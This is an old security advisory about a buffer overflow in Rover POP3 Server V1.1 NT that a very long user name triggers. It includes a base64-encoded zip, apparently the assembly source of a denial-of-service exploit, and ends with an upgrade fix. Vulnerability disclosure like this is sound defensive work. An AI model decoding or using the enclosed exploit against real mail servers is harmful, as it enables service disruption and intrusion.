COMMAND

    Rover POP3 Server

SYSTEMS AFFECTED

    Rover POP3 Server V1.1 NT From aVirt

PROBLEM

    Rover  POP3  Server  V1.1  NT  From  aVirt,  is  a   full-featured
    Internet/Intranet server software package that includes: POP3  and
    SMTP  (Ports  25/110).   UssrLabs  found  a  Local/Remote   Buffer
    overflow,the buffer overflow is caused by a long user name,  10000
    characters, and the re-connection to the Server.

    For the binary or source for this Dos, go to:

        http://www.ussrback.com/

    Mimed source follows:

    ---
    Content-Type: application/octet-stream; name="roverdie.zip"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="roverdie.zip"
    Content-MD5: +zy9K+xe0cnko95Fto70oQ==
    
    UEsDBBQAAgAIAEWVmyeXCI+TzwUAAAY+AAAGAAAATVkuQVNN7ZttbxM5EIA/b6T8Bx9C6qFL
    QzY9oApcUa6tAAmOivByEkKRs+s0C157z/a2SX/9zdi7m31Jegiq++QVKJnx+Jnx2J620s7T
    P+7w6feekverRBP4Z1aMaJmriJFIxowspSLv5BVT5OLtxRGZMYXfr8JhSP56T3Y8Dndnj8PN
    XESLzYR8mM3ekdd0oX8Cd319Pcy1VgsafRtGMv3J6O52sXe7s/3e8Oj4cdbvcRlRrvu9r3ma
    wccwhd3lZMmpGRBtYhjkaM3WRgkI5QUzpzJNqYhfJ4JNJxfv3p42RmcmfgmjnLWGPqnEsFMp
    tOSdaefrxFwoGTGt27Nm05mhyuRZayCSQrDItLSaibilUiy66kJPOaOiA10ZiK+NlNE31vYD
    SzdzGseqHRWXmjVmnONIAHl5I+OcM5eaaeD2dUJaRpiEKWAhEcFOG66N4kxM26OwcTE1FL/0
    ezrjMjFze085XcB2LjaG9XvlcTr7kxxMf/Y58DzP8zzP8zzP8zzP8zzP8zzP8zzP8zzP8zzP
    8zzP8zzP8zzP8zzP8zzP8zzP8zzP8zzP8zzP8zzP8zzP8zzP87z/jzcIjwbhqPG28JwzcWlW
    4IL9k1tX9w9rw/hu8anMNqT2xAtyb38fwBkTCeVELu1AErF7AwJuCfolrQdJ9kV+rdW9Mrhd
    Rth6UG9FeCGJkROyMiabPHzYfoe/QN0G/KDpJZuQs4S5lbyU2rzK/iPU8zVNM16fNh49GobH
    x8Pfnwwfl15HLmM8CDCj9w9RwDReaxozHakkM4kUmHeb8vGjx3ZMb/RcG2pyXQ2F42Oc+Gk2
    xRe9iTYqjwwYf2RKA4LE1+Q5iC+Ty1VTpW/Otp4w9K7v30IS5xn59fkDNJ9ttGHpzLov7Jvx
    1M2TN3Q9sy+868Ifaj7E2dllIfPsIxOxVK/EUhaqchGg1/aFdQDg2/TzRFQL04mYL2ma8E25
    DlBkUpmaiHNIHJfiDVMSAz524Y0eNMmlN1w/ei+isHNJzdDNKrgiTxdUM5TwJKykNhdU0ZSZ
    FWw5OIMt22ZjkS+XTDnj0WgbhtOP9w0cdQcgj/OICrx4ttHBHrqDJcTLJxCsUhuSEDA4GIyf
    rAYHpmyIIEYSgz07GOkv1SVvwjhxp7GpRaczSFIiLs/X9tY7p4WOnA3fDmf2yg3hqdDNKSW6
    qbXrERHPY3dnhyCgLopW2BdimMAM2MsiXItEIfd7Q1d5NHaBTPq9YC1VwOh6AP9LaQHSopJi
    kOJKikCKKkknA/hfWYIUV9IiA0oG0kWuV8FhGMLXU8p5UG9qAd0beRV8ruL8Mjif/g3aqLCs
    N8eAOgVj9ENcuFaEkMhhWLilfEAoByFDry4cxTJxE+iI6gVIQprALSGTWWGBHJw5Hq069jGL
    CnvrTaNzOylKswAbQUhmFPkMA1+wPAVfGbiYRy7uOYfAd9uOC2PYOsVSJgyFNURSmETkbLIt
    kpxR+2mX3bwvLlaMy0ZqlyyXS80MKS5lqR2Fo3BVpnXbBFTb/yKjLm32KwQWfJ/SUl2bTpEm
    FOqbpBMx3FYgSPR2fTDs1gdBhOEoJvuepwTL1Q7Pts0Iz3bDFRoPCFqVAJyHn0WKOrm0sKoV
    qQNEZSNNOrlhRGOBa6S+psE0lOCqKgTNjH+9KYcSKa6l+paIS1Db/q550eBFnhXsVhE7Ic/a
    legEkWkWwJrmTMS2TpTna+I2ELuwEmfmOr/skbOHrxnG5NbzYb9ilW2t39XgXSnA3rG921FN
    s6ZlY9beTBQ/GjAFEA4uu+Tutm9VYpjWLrQnXd8lEpJQndE9iej+2tc+FvVf/Lq50Xaz9jts
    Z22n0u3GrQked8ddGKUWoyFFo9/3s8pZ3dzdtn3j2vbti6u4PdtOwFoZK9oO7VX9kern69/t
    9a+zIz9W8fq9ohpNdprdvrXLRFA+Z+vEVLNHpV2t0bXfa/3UnewtHfZvrhPyzP4lURZMWN3W
    U78HwRL7OxJG/y9QSwMEFAACAAgAkpSbJ6xg2XBhAAAAcwAAAAgAAABNQUtFLkJBVEu2iilJ
    LM6NScrMAzOMjRT0c3OA2FhBv0pBv1Aht5KXC0VRTmZeNlCVboWCfkhBqoJ+soJ+YgFQmV5+
    UpZOUX5ZalFKZqqOjkJmbkF+UYmxkV5OZhIvV0pqjoIWSAkvFwBQSwMEFAACAAgAZ7xWJ9Gb
    7hejAAAAOQEAAAgAAABDT0RFLklOQ22PzarCMBCF94LvMA/gwr0rDRY39YoUXIiU0E6IkJsJ
    yaT4+DY1/QHNZn7yMeecm38y1oJsIINQysYTUIUv3gCd439NqhZa+rBeAVxi0PuxKcYGtvD9
    dmBcd8WAvsN2IkmpgAxNo5Mso83kvJjRpfh0tAcrGizPYDL7S/0QlUI/cfc+40na1uBjwemc
    /C+yi5xgIY2BQSJ/fRKTK3Lt56NtyzdQSwECFAAUAAIACABFlZsnlwiPk88FAAAGPgAABgAA
    AAAAAAABACAAAAAAAAAATVkuQVNNUEsBAhQAFAACAAgAkpSbJ6xg2XBhAAAAcwAAAAgAAAAA
    AAAAAQAgAAAA8wUAAE1BS0UuQkFUUEsBAhQAFAACAAgAZ7xWJ9Gb7hejAAAAOQEAAAgAAAAA
    AAAAAQAgAAAAegYAAENPREUuSU5DUEsFBgAAAAADAAMAoAAAAEMHAAAAAA==
    
    -----

SOLUTION

    Upgrade to: Avirt Mail  3.5 or Avirt Mail  v4 RC1 (Rover now  is a
    discontinued Program).